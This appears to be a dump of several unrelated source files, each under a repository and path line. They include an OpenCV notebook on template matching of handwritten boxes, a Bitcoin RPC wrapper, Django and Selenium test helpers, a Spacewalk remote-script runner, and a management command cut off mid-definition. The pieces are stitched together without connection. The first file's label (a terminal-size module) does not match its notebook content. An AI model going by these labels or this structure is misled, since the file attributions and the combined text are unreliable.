| graveljp/smugcli | smugcli/terminal_size.py | Python | mit | 2,716 | 0.002577 |
# coding: utf-8
# Given code that can extract the contents of the inner rectangles (boxes), we can determine whether the
# contents have changed.
#
# Here, take an image of the previous box and see whether the same contents are still there. The idea is that
# a name does not only get erased, it may also be replaced. We hope to find something more robust than the ink
# method (exploration-2).
#
# In[1]:
LIVENOTEBOOK = True
import cv2
cv2.__version__
import extract_blue_grid
get_contents = extract_blue_grid.get_contents
# In[2]:
def get_content1(imagepath):
"return 2nd box and contour from get_contents"
boxes, contours = get_contents(imagepath)
return boxes[1], contours[1]
# In[3]:
import numpy as np
import matplotlib.pyplot as plt
from skimage.measure import compare_ssim
def imshow(img): plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
imwriting1 = cv2.imread("../reference/frame276.png")
imwriting2 = cv2.imread("../reference/frame280.png")
imempty = cv2.imread("../reference/frame272.png")
if LIVENOTEBOOK:
get_ipython().magic(u'matplotlib inline')
# test plotting
imshow(np.concatenate([imwriting1,imwriting2,imempty], axis=1))
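# In[ ]:

# The compare_ssim import above is otherwise unused in this notebook; this is a minimal
# assumption-level sketch (not the final method explored below) of how structural
# similarity against the empty reference frame could flag a box whose contents changed.
def ssim_to_empty(frame, reference=imempty):
    a = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    b = cv2.cvtColor(reference, cv2.COLOR_BGR2GRAY)
    return compare_ssim(a, b)

print('ssim writing1 vs empty: %.3f' % ssim_to_empty(imwriting1))
print('ssim writing2 vs empty: %.3f' % ssim_to_empty(imwriting2))
print('ssim empty vs empty:    %.3f' % ssim_to_empty(imempty))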
# In[ ]:
# not used:
def threshold_boxes(boxes):
"""Given a list of images, adaptive threshold each image"""
output = []
for img in boxes:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
dst = cv2.adaptiveThreshold(img, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
output.append(dst)
return output
# In[4]:
get_ipython().magic(u'matplotlib inline')
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))
writing1,contours1 = get_content1("../reference/frame276.png")
writing1 = cv2.morphologyEx(writing1, cv2.MORPH_OPEN, kernel)
writing1 = cv2.cvtColor(writing1, cv2.COLOR_BGR2GRAY)
#writing1 = cv2.adaptiveThreshold(writing1, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
writing2,contours2 = get_content1("../reference/frame280.png")
writing2 = cv2.morphologyEx(writing2, cv2.MORPH_OPEN, kernel)
writing2 = cv2.cvtColor(writing2, cv2.COLOR_BGR2GRAY)
#writing2 = cv2.adaptiveThreshold(writing2, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
empty,contoursempty = get_content1("../reference/frame272.png")
empty = cv2.morphologyEx(empty, cv2.MORPH_OPEN, kernel)
empty = cv2.cvtColor(empty, cv2.COLOR_BGR2GRAY)
#empty = cv2.adaptiveThreshold(empty, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
plt.imshow(np.concatenate([writing1,writing2,empty]))
#plt.imshow(writing1)
#writing1.shape, writing2.shape, empty.shape
# In[5]:
writingb, contoursb = get_content1("../reference/frame274.png")
writingb = cv2.morphologyEx(writingb, cv2.MORPH_OPEN, kernel)
writingb = cv2.cvtColor(writingb, cv2.COLOR_BGR2GRAY)
writingc, contoursc = get_content1("../reference/frame275.png")
writingc = cv2.morphologyEx(writingc, cv2.MORPH_OPEN, kernel)
writingc = cv2.cvtColor(writingc, cv2.COLOR_BGR2GRAY)
plt.imshow(np.concatenate([writing1,writingb,writingc]))
# In[6]:
# matching does not work on a whole image: it looks like it does:
img = writing1.copy()
method = cv2.TM_SQDIFF
w, h = writing1.shape[::-1]
res = cv2.matchTemplate(writingb,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val )
plt.imshow(img)
# In[ ]:
# but it matches another word too
img = writing2.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# In[ ]:
# and it matches empty just as well..
img = empty.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# so the first result (2 up ) sounds like the whole img got recognized, great. but retrying it with another word and empty shows we recognize almost everything. There are variations in value but they are pretty close, given all the noise around the image.
#
# i think we should:
# - straighten out the image
# - take a template just around the word bravo
# - then match against a straightened target image
# - the straightening may not be necessary (maybe you write crooked) but template matching is on rects; a possible straightening sketch follows below.
#
#
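# A possible straightening step for the plan above (an assumption-level sketch, not used
# by the cells below): warp the 4-corner box contour to an axis-aligned rectangle. The
# 390x141 output size is taken from the box drawing later in this notebook.

# In[ ]:

def straighten_box(img, contour, out_w=390, out_h=141):
    peri = 0.02 * cv2.arcLength(contour, True)
    quad = cv2.approxPolyDP(contour, peri, True).reshape(-1, 2).astype(np.float32)
    if quad.shape[0] != 4:
        raise ValueError("expected a 4-corner contour")
    # order the corners: top-left, top-right, bottom-right, bottom-left
    s = quad.sum(axis=1)
    d = np.diff(quad, axis=1).ravel()
    src = np.float32([quad[np.argmin(s)], quad[np.argmin(d)],
                      quad[np.argmax(s)], quad[np.argmax(d)]])
    dst_pts = np.float32([[0, 0], [out_w - 1, 0],
                          [out_w - 1, out_h - 1], [0, out_h - 1]])
    M = cv2.getPerspectiveTransform(src, dst_pts)
    return cv2.warpPerspective(img, M, (out_w, out_h))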
# ### Let's try this out with a hand made template without straightening
#
# In[7]:
template = cv2.imread('template.png') # used gimp to cut it
template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
plt.imshow(template)
# In[ ]:
def frame_img(img, dim):
"put image in a black frame so resulting image has shape dim"
framed = np.zeros(dim, dtype=img.dtype)
jx, jy = np.trunc((np.array(dim) - np.array(img.shape))/2).astype(int)
assert jx>0 and jy>0, "Image must be smaller than desired dimensions"
framed[jx:jx+img.shape[0], jy:jy+img.shape[1]] = img
return framed
def locate_template(img, template):
"Find template in image and produce stats + image "
img1 = img.copy()
# method = cv2.TM_SQDIFF, tried this first, works less well and gives numbers that are harder to
# interpret. For sqdiff, lower is better and non-id copies were around 1e6, alpha around 4e6
method = cv2.TM_CCOEFF_NORMED
w, h = template.shape[::-1]
res = cv2.matchTemplate(template,img1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img1,top_left, bottom_right, 128, 2)
print("best val, res.min, res.max:", min_val/1e6, res.min(), res.max())
#framed = frame_img(res, img1.shape)
# this does not work because the scale (min-max) of framed is very different from res.
#plt.imshow(np.concatenate([img1.astype(np.float32)*np.mean(framed), framed.astype(np.float32)]), cmap="gray")
plt.imshow(img1.astype(np.float32), cmap="gray")
return max_val, img1
value, _ = locate_template(writing1, template)
value
# In[ ]:
# for SQDIFF this one scored quite high, with COEFF_NORMED it is fine.
value, _ = locate_template(writingb, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writingc, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writing2, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(empty, template)
"value %2.2e" % value
# ## So we have to find that template and we are in business
# In[8]:
contours1.shape # shape of box shown in writing1
# In[9]:
def scale_contour(contour, scale):
"Shrinks or grows a contour by the given factor"
moments = cv2.moments(contour)
midX = int(round(moments["m10"] / moments["m00"]))
midY = int(round(moments["m01"] / moments["m00"]))
mid = np.array([midX,midY])
contour = contour - mid
contour = (contour * scale).astype(np.int32)
contour += mid
return contour
# In[14]:
c = contours1
dst = np.dstack([writing1.copy(), np.zeros_like(writing1), np.zeros_like(writing1)])
dst = cv2.drawContours(dst, [c], -1, (0,255,0), 3)
peri = 0.01 * cv2.arcLength(c, True)  # approxPolyDP tolerance (epsilon): 1% of the contour perimeter
approx = cv2.approxPolyDP(c, peri, True)
approx = scale_contour(approx, 0.8)
dst = cv2.drawContours(dst, [approx], -1, (0,175,0), 3)
imshow(dst)
#plt.imshow(dst, cmap="gray")
template1 = None  # TODO: crop writing1 around `approx` (e.g. its bounding rect) to build the template
# In[ ]:
# In[ ]:
img = np.zeros((141, 390,3), dtype=np.uint8)
img[:]=(240,240,240)
cv2.drawContours(img, [contours1], -1, (8,255,5), 3)
imshow(img)
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
| dirkjot/pingpongcam | opencv/exploration-3.py | Python | gpl-3.0 | 8,044 | 0.010816 |
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from btcrpc.utils.config_file_reader import ConfigFileReader
import json
import socket, errno
from btcrpc.utils.log import *
log = get_log("BTCRPCCall:")
class BTCRPCCall(object):
def __init__(self, wallet="receive", currency="btc"):
yml_config_reader = ConfigFileReader()
url = yml_config_reader.get_rpc_server(currency=currency, wallet=wallet)
self.access = AuthServiceProxy(url)
def do_getinfo(self):
return self.access.getinfo()
def do_get_new_address(self):
        return self.access.getnewaddress()
def do_set_account(self, address, account):
return self.access.setaccount(address, account)
def do_get_transaction(self, txid):
try:
return self.access.gettransaction(txid)
except RuntimeError:
# return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
def do_list_transactions(self, account, count=10, from_index=0):
try:
return self.access.listtransactions(account, count, from_index)
except RuntimeError:
print("calling failure")
def amount_received_by_address(self, address="", confirms=0):
return self.access.getreceivedbyaddress(address, confirms)
def do_validate_address(self, address=""):
return self.access.validateaddress(address)
def list_transactions(self, account="", count=10, from_index=0):
return self.access.listtransactions(account, count, from_index)
def send_from(self, from_account="", to_address="", amount=0, minconf=1):
return self.access.sendfrom(from_account, to_address, amount, minconf)
def get_received_amount_by_account(self, account="", minconf=1):
return self.access.getreceivedbyaccount(account, minconf)
def get_balance(self, account="", minconf=1):
return self.access.getbalance(account, minconf)
def get_wallet_balance(self):
return self.access.getbalance()
def move(self, from_account="", to_account="", amount=0, minconf=1):
return self.access.move(from_account, to_account, amount, minconf)
def list_accounts(self, confirmations=1):
return self.access.listaccounts(confirmations)
def list_received_by_address(self, confirmations=1, include_empty=False):
return self.access.listreceivedbyaddress(confirmations, include_empty)
def get_addresses_by_account(self, account):
return self.access.getaddressesbyaccount(account)
def set_tx_fee(self, amount):
return self.access.settxfee(amount)
def send_to_address(self, address, amount, subtractfeefromamount=True):
return self.access.sendtoaddress(address, amount, "", "", subtractfeefromamount)
# amount is type of dictionary
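    # Expected call shape (assumption, inferred from the parsing below): pass a single
    # 'amounts' keyword mapping addresses to amounts, e.g.
    #   send_many(from_account="acct", amounts={"1Addr...": 0.1, "1Other...": 0.2})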
def send_many(self, from_account="", minconf=1, **amounts):
log.info("From account: %s", from_account)
log.info("To accounts: %s", json.dumps(amounts))
amounts_string = json.dumps(amounts['amounts'])
amounts_object = json.loads(amounts_string)
try:
return True, self.access.sendmany(from_account, amounts_object, minconf)
except JSONRPCException as ex:
return False, ex
except socket.error as e:
return False, e
| BTCX/BTCX_blockchain | btcxblockchainapi/btcrpc/utils/btc_rpc_call.py | Python | mit | 3,371 | 0.009789 |
import random
import string
from collection.models import CollectionVersion, Collection
from concepts.models import Concept, ConceptVersion, LocalizedText
from oclapi.models import ACCESS_TYPE_EDIT, ACCESS_TYPE_VIEW
from orgs.models import Organization
from sources.models import Source, SourceVersion
from users.models import UserProfile
from mappings.models import Mapping, MappingVersion
from django.contrib.auth.models import User
from django.test import TestCase
class OclApiBaseTestCase(TestCase):
def setUp(self):
self._clear_fixtures()
self.user = create_user()
org_ocl = create_organization("OCL")
create_lookup_concept_classes(self.user, org_ocl)
def _clear_fixtures(self):
LocalizedText.objects.filter().delete()
ConceptVersion.objects.filter().delete()
Concept.objects.filter().delete()
MappingVersion.objects.filter().delete()
Mapping.objects.filter().delete()
SourceVersion.objects.filter().delete()
Source.objects.filter().delete()
CollectionVersion.objects.filter().delete()
Collection.objects.filter().delete()
Organization.objects.filter().delete()
UserProfile.objects.filter().delete()
User.objects.filter().delete()
def tearDown(self):
self._clear_fixtures()
def generate_random_string(length=5):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(length))
def create_localized_text(name, locale='en', type='FULLY_SPECIFIED', locale_preferred=False):
return LocalizedText(name=name, locale=locale, type=type, locale_preferred=locale_preferred)
def create_user():
suffix = generate_random_string()
user = User.objects.create_user(
username="test{0}".format(suffix),
password="test{0}".format(suffix),
email='user{0}@test.com'.format(suffix),
first_name='Test',
last_name='User'
)
create_user_profile(user)
# set password again as create_user hashed it
user.password = "test{0}".format(suffix)
return user
def create_user_profile(user):
suffix = generate_random_string()
mnemonic = user.username if user else 'user{0}'.format(suffix)
return UserProfile.objects.create(user=user, mnemonic=mnemonic)
def create_organization(name=None, mnemonic=None):
suffix = generate_random_string()
name = name if name else 'org{0}'.format(suffix)
mnemonic = mnemonic if mnemonic else name
return Organization.objects.create(name=name, mnemonic=mnemonic)
def create_source(user, validation_schema=None, organization=None, name=None):
suffix = generate_random_string()
source = Source(
name=name if name else "source{0}".format(suffix),
mnemonic=name if name else "source{0}".format(suffix),
full_name=name if name else "Source {0}".format(suffix),
source_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.source.com',
description='This is a test source',
custom_validation_schema=validation_schema
)
if organization is not None:
kwargs = {
'parent_resource': organization
}
else:
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Source.persist_new(source, user, **kwargs)
return Source.objects.get(id=source.id)
def create_collection(user, validation_schema=None, name=None):
suffix = generate_random_string()
collection = Collection(
name=name if name else "collection{0}".format(suffix),
mnemonic=name if name else "collection{0}".format(suffix),
full_name=name if name else "Collection {0}".format(suffix),
collection_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.collection2.com',
description='This is the second test collection',
custom_validation_schema=validation_schema
)
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Collection.persist_new(collection, user, **kwargs)
return Collection.objects.get(id=collection.id)
def create_concept(user, source, source_version=None, names=None, mnemonic=None, descriptions=None, concept_class=None, datatype=None,
force=False, extras=None):
suffix = generate_random_string()
if not names and not force:
names = [create_localized_text("name{0}".format(suffix))]
if not mnemonic and not force:
mnemonic = 'concept{0}'.format(suffix)
if not descriptions and not force:
descriptions = [create_localized_text("desc{0}".format(suffix))]
concept = Concept(
mnemonic=mnemonic,
updated_by=user,
datatype=datatype if datatype else "None",
concept_class=concept_class if concept_class else 'Diagnosis',
names=names,
descriptions=descriptions,
extras=extras
)
if source is not None:
kwargs = {
'parent_resource': source,
}
if source_version is not None:
kwargs['parent_resource_version'] = source_version
errors = Concept.persist_new(concept, user, **kwargs)
else:
errors = Concept.persist_new(concept, user)
return concept, errors
def create_mapping(user, source, from_concept, to_concept, map_type="SAME-AS", mnemonic=None):
mapping=None
if mnemonic:
mapping = Mapping(mnemonic=mnemonic, created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW,)
else:
mapping = Mapping(created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW, )
kwargs = {
'parent_resource': source,
}
Mapping.persist_new(mapping, user, **kwargs)
return Mapping.objects.get(id=mapping.id)
def create_lookup_concept_classes(user, org_ocl):
classes_source = create_source(user, organization=org_ocl, name="Classes")
datatypes_source = create_source(user, organization=org_ocl, name="Datatypes")
nametypes_source = create_source(user, organization=org_ocl, name="NameTypes")
descriptiontypes_source = create_source(user, organization=org_ocl, name="DescriptionTypes")
maptypes_source = create_source(user, organization=org_ocl, name="MapTypes")
locales_source = create_source(user, organization=org_ocl, name="Locales")
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Diagnosis")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Drug")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Test")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Procedure")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("None"), create_localized_text("N/A")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Numeric")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Coded")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Text")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("FULLY_SPECIFIED"), create_localized_text("Fully Specified")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("Short"), create_localized_text("SHORT")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("INDEX_TERM"), create_localized_text("Index Term")])
create_concept(user, nametypes_source, concept_class="NameType", names=[create_localized_text("None")])
create_concept(user, descriptiontypes_source, concept_class="DescriptionType", names=[create_localized_text("None")])
create_concept(user, descriptiontypes_source, concept_class="DescriptionType", names=[create_localized_text("FULLY_SPECIFIED")])
create_concept(user, descriptiontypes_source, concept_class="DescriptionType", names=[create_localized_text("Definition")])
create_concept(user, maptypes_source, concept_class="MapType",
names=[create_localized_text("SAME-AS"), create_localized_text("Same As")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Is Subset of")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Different")])
create_concept(user, maptypes_source, concept_class="MapType",
names=[create_localized_text("BROADER-THAN"), create_localized_text("Broader Than"),
create_localized_text("BROADER_THAN")])
create_concept(user, maptypes_source, concept_class="MapType",
names=[create_localized_text("NARROWER-THAN"), create_localized_text("Narrower Than"),
create_localized_text("NARROWER_THAN")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Q-AND-A")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("More specific than")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Less specific than")])
create_concept(user, maptypes_source, concept_class="MapType", names=[create_localized_text("Something Else")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("en")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("es")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("fr")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("tr")])
create_concept(user, locales_source, concept_class="Locale", names=[create_localized_text("Abkhazian", "en")])
create_concept(user, locales_source, concept_class="Locale",names=[create_localized_text("English", "en")])
| snyaggarwal/oclapi | ocl/test_helper/base.py | Python | mpl-2.0 | 10,616 | 0.004333 |
#
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import os
import sys
import pwd
import grp
import time
import select
import signal
import tempfile
import base64
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# this is ugly, hopefully it will be natively supported in up2date
from actions.configfiles import _local_permission_check, _perm_error
from config_common import local_config
from config_common.rhn_log import set_logfile, log_to_file
sys.path.append('/usr/share/rhn')
from up2date_client import config
# this is a list of the methods that get exported by a module
__rhnexport__ = [
'run',
]
# action version we understand
ACTION_VERSION = 2
# SystemExit exception error code
SYSEXIT_CODE = 3
class SignalHandler:
def __init__(self):
self.gotSigterm = False
# Handle SIGTERM so that we can return status to Satellite
def handle(self, signal, frame):
self.gotSigterm = True
raise SystemExit(SYSEXIT_CODE)
def _create_script_file(script, uid=None, gid=None):
storageDir = tempfile.gettempdir()
script_path = os.path.join(storageDir, 'rhn-remote-script')
# Loop a couple of times to try to get rid of race conditions
for i in range(2):
try:
fd = os.open(script_path, os.O_RDWR | os.O_CREAT | os.O_EXCL, int("0700", 8))
# If this succeeds, break out the loop
break
except OSError:
e = sys.exc_info()[1]
if e.errno != 17: # File exists
raise
# File does exist, try to remove it
try:
os.unlink(script_path)
except OSError:
e = sys.exc_info()[1]
if e.errno != 2: # No such file or directory
raise
else:
# Tried a couple of times, failed; bail out raising the latest error
raise
sf = os.fdopen(fd, 'wb')
sf.write(script.encode("utf-8"))
sf.close()
if uid and gid:
os.chown(script_path, uid, gid)
return script_path
# Make sure the dir-path to a file exists
def _create_path(fpath):
d = os.path.dirname(fpath)
if d and not os.path.exists(d):
os.makedirs(d, int("0700", 8))
return os.path.exists(d)
def run(action_id, params, cache_only=None):
# Setup SIGTERM handler
sHandler = SignalHandler()
signal.signal(signal.SIGTERM, sHandler.handle)
cfg = config.initUp2dateConfig()
local_config.init('rhncfg-client', defaults=dict(cfg.items()))
tempfile.tempdir = local_config.get('script_tmp_dir')
logfile_name = local_config.get('script_log_file')
log_output = local_config.get('script_log_file_enable')
if log_output:
# If we're going to log, make sure we can create the logfile
_create_path(logfile_name)
if cache_only:
return (0, "no-ops for caching", {})
action_type = 'script.run'
if not _local_permission_check(action_type):
return _perm_error(action_type)
extras = {'output':''}
script = params.get('script')
if not script:
return (1, "No script to execute", {})
username = params.get('username')
groupname = params.get('groupname')
if not username:
return (1, "No username given to execute script as", {})
if not groupname:
return (1, "No groupname given to execute script as", {})
timeout = params.get('timeout')
if timeout:
try:
timeout = int(timeout)
except ValueError:
return (1, "Invalid timeout value", {})
else:
timeout = None
db_now = params.get('now')
if not db_now:
return (1, "'now' argument missing", {})
db_now = time.mktime(time.strptime(db_now, "%Y-%m-%d %H:%M:%S"))
now = time.time()
process_start = None
process_end = None
child_pid = None
# determine uid/ugid for script ownership, uid also used for setuid...
try:
user_record = pwd.getpwnam(username)
except KeyError:
return 1, "No such user %s" % username, extras
uid = user_record[2]
ugid = user_record[3]
# create the script on disk
try:
script_path = _create_script_file(script, uid=uid, gid=ugid)
except OSError:
e = sys.exc_info()[1]
return 1, "Problem creating script file: %s" % e, extras
# determine gid to run script as
try:
group_record = grp.getgrnam(groupname)
except KeyError:
return 1, "No such group %s" % groupname, extras
run_as_gid = group_record[2]
# create some pipes to communicate w/ the child process
(pipe_read, pipe_write) = os.pipe()
process_start = time.time()
child_pid = os.fork()
if not child_pid:
        # This is the child: it only writes back to the parent, so close the read end
os.close(pipe_read)
# Redirect both stdout and stderr to the pipe
os.dup2(pipe_write, sys.stdout.fileno())
os.dup2(pipe_write, sys.stderr.fileno())
# Close unnecessary file descriptors (including pipe since it's duped)
for i in range(3, MAXFD):
try:
os.close(i)
except:
pass
# all scripts initial working directory will be /
# puts burden on script writer to ensure cwd is correct within the
# script
os.chdir('/')
# the child process gets the desired uid/gid
os.setgid(run_as_gid)
groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
os.setgroups(groups)
os.setuid(uid)
# give this its own process group (which happens to be equal to its
# pid)
os.setpgrp()
# Finally, exec the script
try:
os.umask(int("022", 8))
os.execv(script_path, [script_path, ])
finally:
# This code can be reached only when script_path can not be
# executed as otherwise execv never returns.
# (The umask syscall always succeeds.)
os._exit(1)
# Parent doesn't write to child, so close that part
os.close(pipe_write)
output = None
timed_out = None
out_stream = tempfile.TemporaryFile()
while 1:
select_wait = None
if timeout:
elapsed = time.time() - process_start
if elapsed >= timeout:
timed_out = 1
# Send TERM to all processes in the child's process group
# Send KILL after that, just to make sure the child died
os.kill(-child_pid, signal.SIGTERM)
time.sleep(2)
os.kill(-child_pid, signal.SIGKILL)
break
select_wait = timeout - elapsed
# XXX try-except here for interrupted system calls
input_fds, output_fds, error_fds = select.select([pipe_read], [], [], select_wait)
if error_fds:
# when would this happen?
os.close(pipe_read)
return 1, "Fatal exceptional case", extras
if not (pipe_read in input_fds):
# Read timed out, should be caught in the next loop
continue
output = os.read(pipe_read, 4096)
if not output:
# End of file from the child
break
out_stream.write(output)
os.close(pipe_read)
# wait for the child to complete
(somepid, exit_status) = os.waitpid(child_pid, 0)
process_end = time.time()
# Copy the output from the temporary file
out_stream.seek(0, 0)
extras['output'] = out_stream.read()
out_stream.close()
# Log script-output locally, unless we're asked not to
if log_output :
set_logfile(logfile_name)
log_to_file(0, extras['output'])
# since output can contain chars that won't make xmlrpc very happy,
# base64 encode it...
extras['base64enc'] = 1
extras['output'] = base64.encodestring(extras['output'])
extras['return_code'] = exit_status
# calculate start and end times in db's timespace
extras['process_start'] = db_now + (process_start - now)
extras['process_end'] = db_now + (process_end - now)
for key in ('process_start', 'process_end'):
extras[key] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(extras[key]))
# clean up the script
os.unlink(script_path)
if timed_out:
return 1, "Script killed, timeout of %s seconds exceeded" % timeout, extras
if exit_status == 0:
return 0, "Script executed", extras
return 1, "Script failed", extras
| jhutar/spacewalk | client/tools/rhncfg/actions/script.py | Python | gpl-2.0 | 9,141 | 0.002297 |
# -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
# -*- coding: utf-8 -*-
"""@package src.wi.tests.cm_networks_test
@author Piotr Wójcik
@author Krzysztof Danielowski
@date 09.01.2013
"""
from wi.tests import WiTestCase
import unittest
class CMNetworksTests(WiTestCase, unittest.TestCase):
@staticmethod
def _test_add_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tfoot/tr/td/ul/li/a", ["Add pool"])
driver.find_element_by_link_text("Add pool").click()
self.wait_for_text("//div[@id='dialog-div']/form/div/fieldset/div/span", ["Pool address"])
driver.find_element_by_id("id_address").clear()
driver.find_element_by_id("id_address").send_keys("10.10.127.0")
driver.find_element_by_id("id_mask").clear()
driver.find_element_by_id("id_mask").send_keys("24")
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully added a pool."])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_unlock_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Unlock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to unlock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully unlocked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def _test_lock_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Lock")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to lock pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully locked pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
@staticmethod
def _test_delete_pool(self):
driver = self.driver
self.base_url = self.TEST_SERVER
self.login_testuser(self.TEST_admin_cm)
self.login_cm_testuser()
driver.get(self.base_url + "/admin_cm/pools/")
self.wait_for_text("//table[@id='item-list']/tbody", ["10.10.127.0"])
self.menu_click("Address", "10.10.127.0", "Delete")
self.wait_for_text("//div[@id='dialog-div']/p", ["Do you want to delete pool"])
driver.find_element_by_css_selector("button.ok-button.mid_button").click()
self.wait_for_message(["You have successfully deleted pool"])
driver.find_element_by_link_text("Logout from CM").click()
driver.find_element_by_link_text("Logout").click()
def test_1_simple(self):
self._test_add_pool(self)
self._test_lock_pool()
self._test_unlock_pool(self)
self._test_delete_pool(self)
| Dev-Cloud-Platform/Dev-Cloud | dev_cloud/cc1/src/wi/tests/cm_networks_test.py | Python | apache-2.0 | 4,435 | 0.00203 |
from app_loader import app_loader
urlpatterns = app_loader.urlpatterns
| michaelkuty/python-app-loader | tests/testapp1/urls.py | Python | bsd-3-clause | 73 | 0 |
from django.core.management.base import NoArgsCommand
from django.contrib.auth.models import User
from api.models import EyeHistory
class Command(NoArgsCommand):
help = 'Detects and removes duplicated history entries'
def handle(self, **options):
